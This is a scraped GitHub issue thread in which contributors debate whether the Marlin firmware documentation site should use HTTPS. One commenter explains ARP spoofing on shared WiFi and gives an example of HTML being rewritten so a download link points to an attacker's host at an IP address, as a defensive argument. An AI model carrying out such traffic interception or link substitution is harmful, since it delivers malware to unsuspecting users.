Comments (8)
Took a little tweaking, but it seems to work!
from marlindocumentation.
Marlin is not a dynamic site and neither requests nor stores user data (in spite of the required cookie notice). There is no need for the site to be encrypted.
from marlindocumentation.
There is no need for the site to be encrypted.
Sure there is! It's 2019, and all websites ought to be encrypted :)
- There are download links on Marlin website. When serving over http, it would be easy to replace those links to a malicious download
- Chrome and Safari mark the website as "Not Secure", which just looks bad and scary.
It's very easy and free these days to serve websites over HTTPS, so why not?
from marlindocumentation.
Be sure to pass this on so people understand:
All of our file downloads are links to HTTPS:// GitHub, not hosted on "quote" marlinfw.org.
I am personally of the opinion that these concerns are overwrought. Malicious files can be served from a secure HTTPS server just as easily simply by getting them onto those site's servers, which is actually a far easier exploit than DNS poisoning.
But here's the crux of the thing. I am very busy and right now with many concerns and I don't feel like going out and obtaining a certificate and dealing with the installation and all of that.
This is a volunteer organization and we all pitch in how we can, according to our specialties and our interests. It sounds like you are much more interested in this subject than me. So, I think you should obtain the certificate and you should help one of our volunteers get it installed. Your efforts would be appreciated.
from marlindocumentation.
All of our file downloads are links to HTTPS:// GitHub, not hosted on "quote" marlinfw.org.
Attacker can easily replace links to his own, served from his own server. Just saying.
from marlindocumentation.
Attacker can easily replace links to his own, served from his own server. Just saying.
Alas, https does not prevent that in any way whatsoever. All HTTPS or SSL does is ensure that no one in the middle can decrypt the packets between you and the server. They can only be decrypted at the endpoints.
from marlindocumentation.
@thinkyhead
HTTPS does prevent that. Probably you misunderstood what I mean.
For example you serve HTML code
<a href="https://github.com/marlin.exe">Download marlin</a>
over HTTP. Then attacker can connect to your WiFi (for example) and do ARP spoofing (for example) and route all your traffic through his machine.
And then replace HTML on page to
<a href="http://1.2.3.4/marlin.exe">Download marlin</a>
on the fly. Then when you click Download marlin
you no longer downloading HTTPS link file. It will be file served by attacker from his own server.
So point
All of our file downloads are links to HTTPS:// GitHub, not hosted on "quote" marlinfw.org.
has no sense or security when HTML code with those links served over HTTP.
from marlindocumentation.
D'oh! Yes, of course you are correct. I was only considering the case of someone who managed to get a bad link into the legitimate site by some means. But truly, the site being open source makes this night impossible.
In any case, GitHub has made it much easier to use HTTPS, so we'll give it a try and see how it goes.
from marlindocumentation.
Related Issues (20)
- Bed temperature setup issue HOT 1
- M48 should be called Probe Precision (or Repeatability) Test HOT 6
- How to reserve gcodes that in development by Prusa or other firmware? HOT 1
- Configuration Guide Translation - Chinese Simplified HOT 13
- Typo in Configuratio_adv.H HOT 2
- Documentation Suggestion - Identify versions for options HOT 1
- Character LCDs and Graphical LCDs out out of date. HOT 3
- EX.xxx Calucaltion in Marlin Code HOT 1
- content detail request: HOT 1
- Input Shaping dosent work in PrusaSlicer HOT 2
- M593 schouldnt start with 0Hz HOT 1
- Auto Build Not Allowing Me To Set Correct Board HOT 1
- Add explanation of leveling grid to documentation
- [FR] Linear Advance Pattern - Link printed elements to allow analysis of the print surface (and ease removal) HOT 3
- M206 description page HOT 1
- New feature: IS calibration tool HOT 2
- Issue with K-factor Calibration Tool HOT 7
- marlin site links to configurations rather than marlin main branch
- Bed leveling ender 3 v2 HOT 1
- A question regarding the M600 parameters E, U, and L HOT 2
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from marlindocumentation.